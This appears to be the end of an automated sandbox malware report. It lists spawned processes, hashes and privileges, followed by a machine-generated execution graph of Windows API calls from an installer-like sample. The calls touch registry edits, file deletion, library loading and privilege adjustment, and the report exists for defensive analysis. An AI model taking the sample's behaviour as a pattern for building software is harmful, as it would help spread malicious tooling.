                                                          Imagebase:0x4a8e0000
                                                          File size:345088 bytes
                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:21
                                                          Start time:05:35:10
                                                          Start date:18/03/2023
                                                          Path:C:\Users\user\AppData\Roaming\file.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\file.exe
                                                          Imagebase:0x400000
                                                          File size:676320 bytes
                                                          MD5 hash:A1AFEF77EEC567ADB1076E8679AF207B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:22
                                                          Start time:05:35:36
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\verclsid.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                                                          Imagebase:0xff520000
                                                          File size:11776 bytes
                                                          MD5 hash:3796AE13F680D9239210513EDA590E86
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:23
                                                          Start time:05:35:38
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\notepad.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT
                                                          Imagebase:0xffa70000
                                                          File size:193536 bytes
                                                          MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.920995691.000007FF00280000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00280000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ff00280000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8186a9d334dd9cb0feefb8e737fcd35b43cc78e7094219c694a074c5487a30bf
                                                            • Instruction ID: 7124490244aa5ef4451e390dd16296ae8c3d111d94112d62d7462eb385d4d442
                                                            • Opcode Fuzzy Hash: 8186a9d334dd9cb0feefb8e737fcd35b43cc78e7094219c694a074c5487a30bf
                                                            • Instruction Fuzzy Hash: 30E0D811B29C0B0FFBD0666C684A7B573C0E754313F500076E80CC26E7DD29F9454381
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:21.6%
                                                            Dynamic/Decrypted Code Coverage:13.8%
                                                            Signature Coverage:16.1%
                                                            Total number of Nodes:1549
                                                            Total number of Limit Nodes:52
402a59 5274->5276 5277 402c17 17 API calls 5275->5277 5276->5270 5285 4062aa 5276->5285 5279 402a1a 5277->5279 5284 4061b5 wsprintfA 5279->5284 5281 402a67 5281->5270 5289 406294 5281->5289 5284->5270 5286 4062b5 5285->5286 5287 4062d8 IIDFromString 5286->5287 5288 4062d1 5286->5288 5287->5281 5288->5281 5292 406279 WideCharToMultiByte 5289->5292 5291 402a88 CoTaskMemFree 5291->5270 5292->5291 5293 401ef9 5294 402c39 17 API calls 5293->5294 5295 401eff 5294->5295 5296 402c39 17 API calls 5295->5296 5297 401f08 5296->5297 5298 402c39 17 API calls 5297->5298 5299 401f11 5298->5299 5300 402c39 17 API calls 5299->5300 5301 401f1a 5300->5301 5302 401423 24 API calls 5301->5302 5303 401f21 5302->5303 5310 405933 ShellExecuteExA 5303->5310 5305 401f5c 5306 4066d8 5 API calls 5305->5306 5307 4027c8 5305->5307 5308 401f76 CloseHandle 5306->5308 5308->5307 5310->5305 4855 401f7b 4856 402c39 17 API calls 4855->4856 4857 401f81 4856->4857 4858 405378 24 API calls 4857->4858 4859 401f8b 4858->4859 4860 4058f0 2 API calls 4859->4860 4861 401f91 4860->4861 4862 401fb2 CloseHandle 4861->4862 4864 4027c8 4861->4864 4870 4066d8 WaitForSingleObject 4861->4870 4862->4864 4866 401fa6 4867 401fb4 4866->4867 4868 401fab 4866->4868 4867->4862 4875 4061b5 wsprintfA 4868->4875 4871 4066f2 4870->4871 4872 406704 GetExitCodeProcess 4871->4872 4873 40669f 2 API calls 4871->4873 4872->4866 4874 4066f9 WaitForSingleObject 4873->4874 4874->4871 4875->4862 5311 401ffb 5312 402c39 17 API calls 5311->5312 5313 402002 5312->5313 5314 406663 5 API calls 5313->5314 5315 402011 5314->5315 5316 402029 GlobalAlloc 5315->5316 5319 402099 5315->5319 5317 40203d 5316->5317 5316->5319 5318 406663 5 API calls 5317->5318 5320 402044 5318->5320 5321 406663 5 API calls 5320->5321 5322 40204e 5321->5322 5322->5319 5326 4061b5 wsprintfA 5322->5326 5324 402089 5327 4061b5 wsprintfA 5324->5327 5326->5324 5327->5319 5328 4039fb 5329 403a06 5328->5329 5330 403a0a 5329->5330 5331 403a0d GlobalAlloc 5329->5331 5331->5330 
5332 4018fd 5333 401934 5332->5333 5334 402c39 17 API calls 5333->5334 5335 401939 5334->5335 5336 405a19 67 API calls 5335->5336 5337 401942 5336->5337 4900 40247e 4901 402c39 17 API calls 4900->4901 4902 402490 4901->4902 4903 402c39 17 API calls 4902->4903 4904 40249a 4903->4904 4917 402cc9 4904->4917 4907 402ac5 4908 4024cf 4910 4024db 4908->4910 4912 402c17 17 API calls 4908->4912 4909 402c39 17 API calls 4911 4024c8 lstrlenA 4909->4911 4913 4024fd RegSetValueExA 4910->4913 4914 403143 31 API calls 4910->4914 4911->4908 4912->4910 4915 402513 RegCloseKey 4913->4915 4914->4913 4915->4907 4918 402ce4 4917->4918 4921 40610b 4918->4921 4922 40611a 4921->4922 4923 406125 RegCreateKeyExA 4922->4923 4924 4024aa 4922->4924 4923->4924 4924->4907 4924->4908 4924->4909 5338 401cfe 5339 402c17 17 API calls 5338->5339 5340 401d04 IsWindow 5339->5340 5341 401a0e 5340->5341 5342 401000 5343 401037 BeginPaint GetClientRect 5342->5343 5344 40100c DefWindowProcA 5342->5344 5346 4010f3 5343->5346 5347 401179 5344->5347 5348 401073 CreateBrushIndirect FillRect DeleteObject 5346->5348 5349 4010fc 5346->5349 5348->5346 5350 401102 CreateFontIndirectA 5349->5350 5351 401167 EndPaint 5349->5351 5350->5351 5352 401112 6 API calls 5350->5352 5351->5347 5352->5351 5353 401900 5354 402c39 17 API calls 5353->5354 5355 401907 5354->5355 5356 40596d MessageBoxIndirectA 5355->5356 5357 401910 5356->5357 5358 402780 5359 402786 5358->5359 5360 40278a FindNextFileA 5359->5360 5363 40279c 5359->5363 5361 4027db 5360->5361 5360->5363 5364 406257 lstrcpynA 5361->5364 5364->5363 5365 401502 5366 40150a 5365->5366 5368 40151d 5365->5368 5367 402c17 17 API calls 5366->5367 5367->5368 5369 73c21000 5372 73c2101b 5369->5372 5379 73c21504 5372->5379 5374 73c21020 5375 73c21032 5374->5375 5376 73c21024 GlobalAlloc 5374->5376 5377 73c21558 3 API calls 5375->5377 5376->5375 5378 73c21019 5377->5378 5381 73c2150a 5379->5381 5380 73c21510 5380->5374 5381->5380 5382 73c2151c GlobalFree 5381->5382 5382->5374 
3856 73c21606 3857 73c21637 3856->3857 3898 73c22288 3857->3898 3859 73c2163e 3860 73c2176f 3859->3860 3861 73c21656 3859->3861 3862 73c2164f 3859->3862 3929 73c21f58 3861->3929 3945 73c21edd 3862->3945 3867 73c21680 3868 73c216a2 3867->3868 3869 73c216c0 3867->3869 3958 73c22128 3868->3958 3871 73c21711 3869->3871 3872 73c216c6 3869->3872 3870 73c2166b 3876 73c21682 3870->3876 3877 73c21675 3870->3877 3881 73c22128 11 API calls 3871->3881 3977 73c21e71 3872->3977 3873 73c2168a 3873->3867 3955 73c22e4f 3873->3955 3875 73c216a8 3969 73c215f4 3875->3969 3949 73c21774 3876->3949 3877->3867 3939 73c22bc4 3877->3939 3885 73c216fe 3881->3885 3890 73c2175e 3885->3890 3982 73c21f1f 3885->3982 3887 73c21688 3887->3867 3888 73c22128 11 API calls 3888->3885 3890->3860 3893 73c21768 GlobalFree 3890->3893 3893->3860 3895 73c2174f 3895->3890 3986 73c21558 wsprintfA 3895->3986 3896 73c21742 FreeLibrary 3896->3895 3989 73c212c6 GlobalAlloc 3898->3989 3900 73c222b4 3990 73c212c6 GlobalAlloc 3900->3990 3902 73c228f7 GlobalFree GlobalFree GlobalFree 3903 73c22917 3902->3903 3914 73c22965 3902->3914 3905 73c229b5 3903->3905 3912 73c22930 3903->3912 3903->3914 3904 73c222bf 3904->3902 3906 73c22814 GlobalAlloc 3904->3906 3908 73c22866 lstrcpyA 3904->3908 3909 73c22884 GlobalFree 3904->3909 3913 73c22871 lstrcpyA 3904->3913 3923 73c228c2 3904->3923 3924 73c22718 GlobalFree 3904->3924 3925 73c227b8 lstrcpyA 3904->3925 3991 73c212c6 GlobalAlloc 3904->3991 3992 73c212af 3904->3992 3907 73c229d6 GetModuleHandleA 3905->3907 3905->3914 3906->3904 3910 73c229e7 LoadLibraryA 3907->3910 3911 73c229fc 3907->3911 3908->3913 3909->3904 3910->3911 3910->3914 3997 73c21ece GetProcAddress 3911->3997 3912->3914 3919 73c212af 2 API calls 3912->3919 3913->3904 3914->3859 3916 73c22a09 3917 73c22a48 3916->3917 3928 73c22a32 GetProcAddress 3916->3928 3917->3914 3918 73c22a56 lstrlenA 3917->3918 3998 73c21ece GetProcAddress 3918->3998 3919->3914 3922 73c22a70 3922->3914 3923->3904 3995 73c212d5 GlobalSize 
GlobalAlloc 3923->3995 3924->3904 3925->3904 3928->3917 3936 73c21f6d 3929->3936 3931 73c220dc GlobalFree 3932 73c2165c 3931->3932 3931->3936 3932->3867 3932->3870 3932->3873 3933 73c22038 GlobalAlloc MultiByteToWideChar 3935 73c22067 GlobalAlloc CLSIDFromString GlobalFree 3933->3935 3938 73c22090 3933->3938 3934 73c212af lstrcpynA GlobalAlloc 3934->3936 3935->3931 3936->3931 3936->3933 3936->3934 3936->3938 4000 73c214e2 3936->4000 3938->3931 3938->3936 4005 73c21958 3938->4005 3941 73c22bd6 3939->3941 3940 73c22c7b CreateFileA 3944 73c22c99 3940->3944 3941->3940 4008 73c22b72 3944->4008 3946 73c21ef0 3945->3946 3947 73c21efb GlobalAlloc 3946->3947 3948 73c21655 3946->3948 3947->3946 3948->3861 3953 73c217a0 3949->3953 3950 73c21814 GlobalAlloc 3954 73c21832 3950->3954 3951 73c21825 3952 73c21829 GlobalSize 3951->3952 3951->3954 3952->3954 3953->3950 3953->3951 3954->3887 3957 73c22e5a 3955->3957 3956 73c22e9a GlobalFree 3957->3956 4011 73c212c6 GlobalAlloc 3958->4011 3960 73c221b0 StringFromGUID2 WideCharToMultiByte 3966 73c22136 3960->3966 3961 73c221d8 WideCharToMultiByte 3961->3966 3962 73c2219f lstrcpynA 3962->3966 3963 73c22202 wsprintfA 3963->3966 3964 73c22225 GlobalFree 3964->3966 3965 73c2225c GlobalFree 3965->3875 3966->3960 3966->3961 3966->3962 3966->3963 3966->3964 3966->3965 3967 73c2157e 2 API calls 3966->3967 4012 73c215c7 3966->4012 3967->3966 4016 73c212c6 GlobalAlloc 3969->4016 3971 73c215f9 3972 73c21e71 2 API calls 3971->3972 3973 73c21603 3972->3973 3974 73c2157e 3973->3974 3975 73c215c2 GlobalFree 3974->3975 3976 73c21587 GlobalAlloc lstrcpynA 3974->3976 3975->3885 3976->3975 3978 73c21e7e wsprintfA 3977->3978 3979 73c21eaf lstrcpyA 3977->3979 3981 73c216e5 3978->3981 3979->3981 3981->3888 3983 73c21724 3982->3983 3984 73c21f2e 3982->3984 3983->3895 3983->3896 3984->3983 3985 73c21f42 GlobalFree 3984->3985 3985->3984 3987 73c2157e 2 API calls 3986->3987 3988 73c21579 3987->3988 3988->3890 3989->3900 3990->3904 3991->3904 3999 73c212c6 
GlobalAlloc 3992->3999 3994 73c212be lstrcpynA 3994->3904 3996 73c212f3 3995->3996 3996->3923 3997->3916 3998->3922 3999->3994 4001 73c212c6 GlobalAlloc 4000->4001 4002 73c214ef 4000->4002 4001->3936 4003 73c212af 2 API calls 4002->4003 4004 73c21502 4003->4004 4004->3936 4006 73c21967 VirtualAlloc 4005->4006 4007 73c219c5 4005->4007 4006->4007 4007->3938 4009 73c22b80 GetLastError 4008->4009 4010 73c22b8b 4008->4010 4009->4010 4010->3867 4011->3966 4013 73c215ce 4012->4013 4014 73c215ef 4012->4014 4013->4014 4015 73c215d7 lstrcpyA 4013->4015 4014->3966 4015->4014 4016->3971 5383 73c21a87 5384 73c21ab5 5383->5384 5385 73c22288 18 API calls 5384->5385 5386 73c21abc 5385->5386 5387 73c21ac3 5386->5387 5388 73c21acf 5386->5388 5389 73c2157e 2 API calls 5387->5389 5390 73c21af0 5388->5390 5391 73c21ad9 5388->5391 5394 73c21acd 5389->5394 5392 73c21af6 5390->5392 5393 73c21b1c 5390->5393 5395 73c21558 3 API calls 5391->5395 5396 73c215f4 3 API calls 5392->5396 5397 73c21558 3 API calls 5393->5397 5398 73c21ade 5395->5398 5399 73c21afb 5396->5399 5397->5394 5400 73c215f4 3 API calls 5398->5400 5401 73c2157e 2 API calls 5399->5401 5402 73c21ae4 5400->5402 5404 73c21b01 GlobalFree 5401->5404 5403 73c2157e 2 API calls 5402->5403 5405 73c21aea GlobalFree 5403->5405 5404->5394 5404->5405 4131 401b87 4132 401b94 4131->4132 4133 401bd8 4131->4133 4136 401c1c 4132->4136 4139 401bab 4132->4139 4134 401c01 GlobalAlloc 4133->4134 4135 401bdc 4133->4135 4138 4062ea 17 API calls 4134->4138 4145 40238f 4135->4145 4152 406257 lstrcpynA 4135->4152 4137 4062ea 17 API calls 4136->4137 4136->4145 4141 402389 4137->4141 4138->4136 4150 406257 lstrcpynA 4139->4150 4141->4145 4153 40596d 4141->4153 4143 401bee GlobalFree 4143->4145 4144 401bba 4151 406257 lstrcpynA 4144->4151 4148 401bc9 4157 406257 lstrcpynA 4148->4157 4150->4144 4151->4148 4152->4143 4155 405982 4153->4155 4154 4059ce 4154->4145 4155->4154 4156 405996 MessageBoxIndirectA 4155->4156 4156->4154 4157->4145 5407 40440a 
lstrcpynA lstrlenA 5408 40298a 5409 402c17 17 API calls 5408->5409 5410 402990 5409->5410 5411 4062ea 17 API calls 5410->5411 5412 4027c8 5410->5412 5411->5412 5413 40260c 5414 402c39 17 API calls 5413->5414 5415 402613 5414->5415 5418 405dea GetFileAttributesA CreateFileA 5415->5418 5417 40261f 5418->5417 5419 401490 5420 405378 24 API calls 5419->5420 5421 401497 5420->5421 5422 402590 5423 402c79 17 API calls 5422->5423 5424 40259a 5423->5424 5425 402c17 17 API calls 5424->5425 5426 4025a3 5425->5426 5427 4025ca RegEnumValueA 5426->5427 5428 4025be RegEnumKeyA 5426->5428 5429 4027c8 5426->5429 5430 4025df RegCloseKey 5427->5430 5428->5430 5430->5429 4896 40159d 4897 402c39 17 API calls 4896->4897 4898 4015a4 SetFileAttributesA 4897->4898 4899 4015b6 4898->4899 5432 40149d 5433 4014ab PostQuitMessage 5432->5433 5434 40238f 5432->5434 5433->5434 4925 401a1e 4926 402c39 17 API calls 4925->4926 4927 401a27 ExpandEnvironmentStringsA 4926->4927 4928 401a3b 4927->4928 4930 401a4e 4927->4930 4929 401a40 lstrcmpA 4928->4929 4928->4930 4929->4930 5440 40251e 5441 402c79 17 API calls 5440->5441 5442 402528 5441->5442 5443 402c39 17 API calls 5442->5443 5444 402531 5443->5444 5445 40253b RegQueryValueExA 5444->5445 5450 4027c8 5444->5450 5446 402561 RegCloseKey 5445->5446 5447 40255b 5445->5447 5446->5450 5447->5446 5451 4061b5 wsprintfA 5447->5451 5451->5446 5452 40471f 5453 404755 5452->5453 5454 40472f 5452->5454 5456 40433b 8 API calls 5453->5456 5455 4042d4 18 API calls 5454->5455 5457 40473c SetDlgItemTextA 5455->5457 5458 404761 5456->5458 5457->5453 5459 40171f 5460 402c39 17 API calls 5459->5460 5461 401726 SearchPathA 5460->5461 5462 401741 5461->5462 5463 401d1f 5464 402c17 17 API calls 5463->5464 5465 401d26 5464->5465 5466 402c17 17 API calls 5465->5466 5467 401d32 GetDlgItem 5466->5467 5468 402628 5467->5468 5469 402aa0 SendMessageA 5470 402ac5 5469->5470 5471 402aba InvalidateRect 5469->5471 5471->5470 4017 4023a4 4018 4023b2 4017->4018 4019 4023ac 4017->4019 
4021 4023c2 4018->4021 4022 402c39 17 API calls 4018->4022 4020 402c39 17 API calls 4019->4020 4020->4018 4024 402c39 17 API calls 4021->4024 4026 4023d0 4021->4026 4022->4021 4024->4026 4027 402c39 4026->4027 4028 402c45 4027->4028 4033 4062ea 4028->4033 4031 4023d9 WritePrivateProfileStringA 4041 4062f7 4033->4041 4034 40651c 4035 402c66 4034->4035 4066 406257 lstrcpynA 4034->4066 4035->4031 4050 406535 4035->4050 4037 4064f6 lstrlenA 4037->4041 4038 4062ea 10 API calls 4038->4037 4041->4034 4041->4037 4041->4038 4043 406412 GetSystemDirectoryA 4041->4043 4044 406425 GetWindowsDirectoryA 4041->4044 4045 406535 5 API calls 4041->4045 4046 4062ea 10 API calls 4041->4046 4047 40649f lstrcatA 4041->4047 4048 406459 SHGetSpecialFolderLocation 4041->4048 4059 40613e 4041->4059 4064 4061b5 wsprintfA 4041->4064 4065 406257 lstrcpynA 4041->4065 4043->4041 4044->4041 4045->4041 4046->4041 4047->4041 4048->4041 4049 406471 SHGetPathFromIDListA CoTaskMemFree 4048->4049 4049->4041 4057 406541 4050->4057 4051 4065ad CharPrevA 4053 4065a9 4051->4053 4052 40659e CharNextA 4052->4053 4052->4057 4053->4051 4054 4065c8 4053->4054 4054->4031 4056 40658c CharNextA 4056->4057 4057->4052 4057->4053 4057->4056 4058 406599 CharNextA 4057->4058 4071 405c14 4057->4071 4058->4052 4067 4060dd 4059->4067 4062 406172 RegQueryValueExA RegCloseKey 4063 4061a1 4062->4063 4063->4041 4064->4041 4065->4041 4066->4035 4068 4060ec 4067->4068 4069 4060f5 RegOpenKeyExA 4068->4069 4070 4060f0 4068->4070 4069->4070 4070->4062 4070->4063 4072 405c1a 4071->4072 4073 405c2d 4072->4073 4074 405c20 CharNextA 4072->4074 4073->4057 4074->4072 4089 4020a5 4090 4020b7 4089->4090 4100 402165 4089->4100 4091 402c39 17 API calls 4090->4091 4092 4020be 4091->4092 4094 402c39 17 API calls 4092->4094 4093 401423 24 API calls 4096 4022ea 4093->4096 4095 4020c7 4094->4095 4097 4020dc LoadLibraryExA 4095->4097 4098 4020cf GetModuleHandleA 4095->4098 4099 4020ec GetProcAddress 4097->4099 4097->4100 4098->4097 4098->4099 
4101 402138 4099->4101 4102 4020fb 4099->4102 4100->4093 4110 405378 4101->4110 4105 40210b 4102->4105 4107 401423 4102->4107 4105->4096 4106 402159 FreeLibrary 4105->4106 4106->4096 4108 405378 24 API calls 4107->4108 4109 401431 4108->4109 4109->4105 4111 405436 4110->4111 4112 405393 4110->4112 4111->4105 4113 4053b0 lstrlenA 4112->4113 4116 4062ea 17 API calls 4112->4116 4114 4053d9 4113->4114 4115 4053be lstrlenA 4113->4115 4118 4053ec 4114->4118 4119 4053df SetWindowTextA 4114->4119 4115->4111 4117 4053d0 lstrcatA 4115->4117 4116->4113 4117->4114 4118->4111 4120 4053f2 SendMessageA SendMessageA SendMessageA 4118->4120 4119->4118 4120->4111 5472 402e25 5473 402e34 SetTimer 5472->5473 5474 402e4d 5472->5474 5473->5474 5475 402ea2 5474->5475 5476 402e67 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5474->5476 5476->5475 5477 73c22b24 5478 73c22b76 5477->5478 5479 73c22b80 GetLastError 5478->5479 5480 73c22b8b 5478->5480 5479->5480 5481 73c21a24 5482 73c21504 GlobalFree 5481->5482 5484 73c21a3c 5482->5484 5483 73c21a7e GlobalFree 5484->5483 5485 73c21a5a 5484->5485 5486 73c21a6a VirtualFree 5484->5486 5485->5483 5486->5483 4158 402429 4159 402430 4158->4159 4160 40245b 4158->4160 4174 402c79 4159->4174 4162 402c39 17 API calls 4160->4162 4164 402462 4162->4164 4170 402cf7 4164->4170 4165 402441 4167 402c39 17 API calls 4165->4167 4169 402448 RegDeleteValueA RegCloseKey 4167->4169 4168 40246f 4169->4168 4171 402d0a 4170->4171 4173 402d03 4170->4173 4171->4173 4179 402d3b 4171->4179 4173->4168 4175 402c39 17 API calls 4174->4175 4176 402c90 4175->4176 4177 4060dd RegOpenKeyExA 4176->4177 4178 402437 4177->4178 4178->4165 4178->4168 4180 4060dd RegOpenKeyExA 4179->4180 4181 402d69 4180->4181 4182 402d73 4181->4182 4183 402e1e 4181->4183 4184 402d79 RegEnumValueA 4182->4184 4189 402d9c 4182->4189 4183->4173 4185 402e03 RegCloseKey 4184->4185 4184->4189 4185->4183 4186 402dd8 RegEnumKeyA 4187 402de1 RegCloseKey 4186->4187 4186->4189 4194 406663 GetModuleHandleA 
4187->4194 4189->4185 4189->4186 4189->4187 4190 402d3b 6 API calls 4189->4190 4190->4189 4192 402e13 4192->4183 4193 402df5 RegDeleteKeyA 4193->4183 4195 406689 GetProcAddress 4194->4195 4196 40667f 4194->4196 4197 402df1 4195->4197 4200 4065f5 GetSystemDirectoryA 4196->4200 4197->4192 4197->4193 4199 406685 4199->4195 4199->4197 4201 406617 wsprintfA LoadLibraryExA 4200->4201 4201->4199 5487 73c21c2b 5488 73c21c52 5487->5488 5489 73c21cad __alldvrm 5488->5489 5490 73c21c8f GlobalFree 5488->5490 5491 73c2157e 2 API calls 5489->5491 5490->5489 5492 73c21d41 GlobalFree GlobalFree 5491->5492 5493 4027aa 5494 402c39 17 API calls 5493->5494 5495 4027b1 FindFirstFileA 5494->5495 5496 4027d4 5495->5496 5500 4027c4 5495->5500 5497 4027db 5496->5497 5501 4061b5 wsprintfA 5496->5501 5502 406257 lstrcpynA 5497->5502 5501->5497 5502->5500 5503 401c2e 5504 402c17 17 API calls 5503->5504 5505 401c35 5504->5505 5506 402c17 17 API calls 5505->5506 5507 401c42 5506->5507 5508 401c57 5507->5508 5509 402c39 17 API calls 5507->5509 5510 401c67 5508->5510 5511 402c39 17 API calls 5508->5511 5509->5508 5512 401c72 5510->5512 5513 401cbe 5510->5513 5511->5510 5515 402c17 17 API calls 5512->5515 5514 402c39 17 API calls 5513->5514 5516 401cc3 5514->5516 5517 401c77 5515->5517 5518 402c39 17 API calls 5516->5518 5519 402c17 17 API calls 5517->5519 5521 401ccc FindWindowExA 5518->5521 5520 401c83 5519->5520 5522 401c90 SendMessageTimeoutA 5520->5522 5523 401cae SendMessageA 5520->5523 5524 401cea 5521->5524 5522->5524 5523->5524 5525 40262e 5526 402633 5525->5526 5527 402647 5525->5527 5529 402c17 17 API calls 5526->5529 5528 402c39 17 API calls 5527->5528 5530 40264e lstrlenA 5528->5530 5531 40263c 5529->5531 5530->5531 5532 405e91 WriteFile 5531->5532 5533 402670 5531->5533 5532->5533 4203 401932 4204 401934 4203->4204 4205 402c39 17 API calls 4204->4205 4206 401939 4205->4206 4209 405a19 4206->4209 4250 405cd7 4209->4250 4212 405a41 DeleteFileA 4217 401942 4212->4217 4213 405a58 4216 
405b90 4213->4216 4264 406257 lstrcpynA 4213->4264 4215 405a7e 4218 405a91 4215->4218 4219 405a84 lstrcatA 4215->4219 4216->4217 4282 4065ce FindFirstFileA 4216->4282 4265 405c30 lstrlenA 4218->4265 4221 405a97 4219->4221 4224 405aa5 lstrcatA 4221->4224 4225 405a9c 4221->4225 4227 405ab0 lstrlenA FindFirstFileA 4224->4227 4225->4224 4225->4227 4226 405bae 4285 405be9 lstrlenA CharPrevA 4226->4285 4229 405b86 4227->4229 4248 405ad4 4227->4248 4229->4216 4231 405c14 CharNextA 4231->4248 4232 4059d1 5 API calls 4233 405bc0 4232->4233 4234 405bc4 4233->4234 4235 405bda 4233->4235 4234->4217 4240 405378 24 API calls 4234->4240 4236 405378 24 API calls 4235->4236 4236->4217 4237 405b65 FindNextFileA 4239 405b7d FindClose 4237->4239 4237->4248 4239->4229 4241 405bd1 4240->4241 4242 406030 36 API calls 4241->4242 4245 405bd8 4242->4245 4244 405a19 60 API calls 4244->4248 4245->4217 4246 405378 24 API calls 4246->4237 4247 405378 24 API calls 4247->4248 4248->4231 4248->4237 4248->4244 4248->4246 4248->4247 4269 406257 lstrcpynA 4248->4269 4270 4059d1 4248->4270 4278 406030 MoveFileExA 4248->4278 4288 406257 lstrcpynA 4250->4288 4252 405ce8 4289 405c82 CharNextA CharNextA 4252->4289 4255 405a39 4255->4212 4255->4213 4256 406535 5 API calls 4262 405cfe 4256->4262 4257 405d29 lstrlenA 4258 405d34 4257->4258 4257->4262 4260 405be9 3 API calls 4258->4260 4259 4065ce 2 API calls 4259->4262 4261 405d39 GetFileAttributesA 4260->4261 4261->4255 4262->4255 4262->4257 4262->4259 4263 405c30 2 API calls 4262->4263 4263->4257 4264->4215 4266 405c3d 4265->4266 4267 405c42 CharPrevA 4266->4267 4268 405c4e 4266->4268 4267->4266 4267->4268 4268->4221 4269->4248 4295 405dc5 GetFileAttributesA 4270->4295 4273 4059f4 DeleteFileA 4275 4059fa 4273->4275 4274 4059ec RemoveDirectoryA 4274->4275 4276 4059fe 4275->4276 4277 405a0a SetFileAttributesA 4275->4277 4276->4248 4277->4276 4279 406051 4278->4279 4280 406044 4278->4280 4279->4248 4298 405ec0 4280->4298 4283 4065e4 FindClose 4282->4283 4284 
405baa 4282->4284 4283->4284 4284->4217 4284->4226 4286 405c03 lstrcatA 4285->4286 4287 405bb4 4285->4287 4286->4287 4287->4232 4288->4252 4290 405c9d 4289->4290 4294 405cad 4289->4294 4292 405ca8 CharNextA 4290->4292 4290->4294 4291 405ccd 4291->4255 4291->4256 4292->4291 4293 405c14 CharNextA 4293->4294 4294->4291 4294->4293 4296 4059dd 4295->4296 4297 405dd7 SetFileAttributesA 4295->4297 4296->4273 4296->4274 4296->4276 4297->4296 4299 405ee6 4298->4299 4300 405f0c GetShortPathNameA 4298->4300 4325 405dea GetFileAttributesA CreateFileA 4299->4325 4302 405f21 4300->4302 4303 40602b 4300->4303 4302->4303 4304 405f29 wsprintfA 4302->4304 4303->4279 4306 4062ea 17 API calls 4304->4306 4305 405ef0 CloseHandle GetShortPathNameA 4305->4303 4307 405f04 4305->4307 4308 405f51 4306->4308 4307->4300 4307->4303 4326 405dea GetFileAttributesA CreateFileA 4308->4326 4310 405f5e 4310->4303 4311 405f6d GetFileSize GlobalAlloc 4310->4311 4312 406024 CloseHandle 4311->4312 4313 405f8f 4311->4313 4312->4303 4327 405e62 ReadFile 4313->4327 4318 405fc2 4320 405d4f 4 API calls 4318->4320 4319 405fae lstrcpyA 4321 405fd0 4319->4321 4320->4321 4322 406007 SetFilePointer 4321->4322 4334 405e91 WriteFile 4322->4334 4325->4305 4326->4310 4328 405e80 4327->4328 4328->4312 4329 405d4f lstrlenA 4328->4329 4330 405d90 lstrlenA 4329->4330 4331 405d98 4330->4331 4332 405d69 lstrcmpiA 4330->4332 4331->4318 4331->4319 4332->4331 4333 405d87 CharNextA 4332->4333 4333->4330 4335 405eaf GlobalFree 4334->4335 4335->4312 4351 4033b3 SetErrorMode GetVersionExA 4352 403405 GetVersionExA 4351->4352 4354 403444 4351->4354 4353 403421 4352->4353 4352->4354 4353->4354 4355 4034c8 4354->4355 4356 406663 5 API calls 4354->4356 4357 4065f5 3 API calls 4355->4357 4356->4355 4358 4034de lstrlenA 4357->4358 4358->4355 4359 4034ee 4358->4359 4360 406663 5 API calls 4359->4360 4361 4034f5 4360->4361 4362 406663 5 API calls 4361->4362 4363 4034fc 4362->4363 4364 406663 5 API calls 4363->4364 4365 403508 #17 
OleInitialize SHGetFileInfoA 4364->4365 4443 406257 lstrcpynA 4365->4443 4368 403556 GetCommandLineA 4444 406257 lstrcpynA 4368->4444 4370 403568 4371 405c14 CharNextA 4370->4371 4372 40358f CharNextA 4371->4372 4380 40359e 4372->4380 4373 403664 4374 403678 GetTempPathA 4373->4374 4445 403382 4374->4445 4376 403690 4377 403694 GetWindowsDirectoryA lstrcatA 4376->4377 4378 4036ea DeleteFileA 4376->4378 4381 403382 12 API calls 4377->4381 4455 402f0c GetTickCount GetModuleFileNameA 4378->4455 4379 405c14 CharNextA 4379->4380 4380->4373 4380->4379 4384 403666 4380->4384 4383 4036b0 4381->4383 4383->4378 4387 4036b4 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4383->4387 4539 406257 lstrcpynA 4384->4539 4385 4036fd 4393 405c14 CharNextA 4385->4393 4426 403782 4385->4426 4438 403792 4385->4438 4389 403382 12 API calls 4387->4389 4391 4036e2 4389->4391 4391->4378 4391->4438 4394 403717 4393->4394 4401 4037c1 4394->4401 4402 40375c 4394->4402 4395 4037ac 4397 40596d MessageBoxIndirectA 4395->4397 4396 4038cf 4398 4038d7 GetCurrentProcess OpenProcessToken 4396->4398 4399 40394d ExitProcess 4396->4399 4403 4037b9 ExitProcess 4397->4403 4404 40391d 4398->4404 4405 4038ee LookupPrivilegeValueA AdjustTokenPrivileges 4398->4405 4549 4058d8 4401->4549 4406 405cd7 18 API calls 4402->4406 4408 406663 5 API calls 4404->4408 4405->4404 4409 403768 4406->4409 4411 403924 4408->4411 4409->4438 4540 406257 lstrcpynA 4409->4540 4414 403939 ExitWindowsEx 4411->4414 4415 403946 4411->4415 4412 4037e2 lstrcatA lstrcmpiA 4417 4037fe 4412->4417 4412->4438 4413 4037d7 lstrcatA 4413->4412 4414->4399 4414->4415 4565 40140b 4415->4565 4420 403803 4417->4420 4421 40380a 